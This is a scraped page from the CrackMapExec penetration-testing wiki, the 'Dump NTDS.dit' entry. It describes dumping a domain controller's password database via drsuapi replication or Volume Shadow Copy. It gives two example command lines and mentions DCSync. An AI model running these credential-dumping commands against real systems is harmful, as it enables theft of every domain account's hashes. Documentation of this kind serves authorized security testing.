π±
π±
π±
π±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2
@byt3bl33d3r
@mpgn_x64
Searchβ¦
Introduction
π₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
π
BloodHound integration
Report bugs or new features
π²
Audit Mode
SMB protocol
π
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
Dump SAM
Dump LSA
Dump NTDS.dit
Dump LSASS
Dump WIFI password
π
Defeating LAPS
π
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
π
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
π
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
π
RDP Protocol
Password spraying
Install aardwolf lib
Powered By
GitBook
Dump NTDS.dit
Dump the NTDS.dit from target DC using methods from secretsdump.py
Requires Domain Admin or Local Admin Priviledges on target Domain Controller
1
2 methods are available:
2
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
3
additional drsuapi calls to convert the resultant linked-lists into readable format
4
vss - Uses the Volume Shadow copy Service
Copied!
1
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
2
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Copied!
You can also DCSYNC with the computer account of the DC
Remember to play this music everytime you got DA
Previous
Dump LSA
Next
Dump LSASS
Last modified
5mo ago
Copy link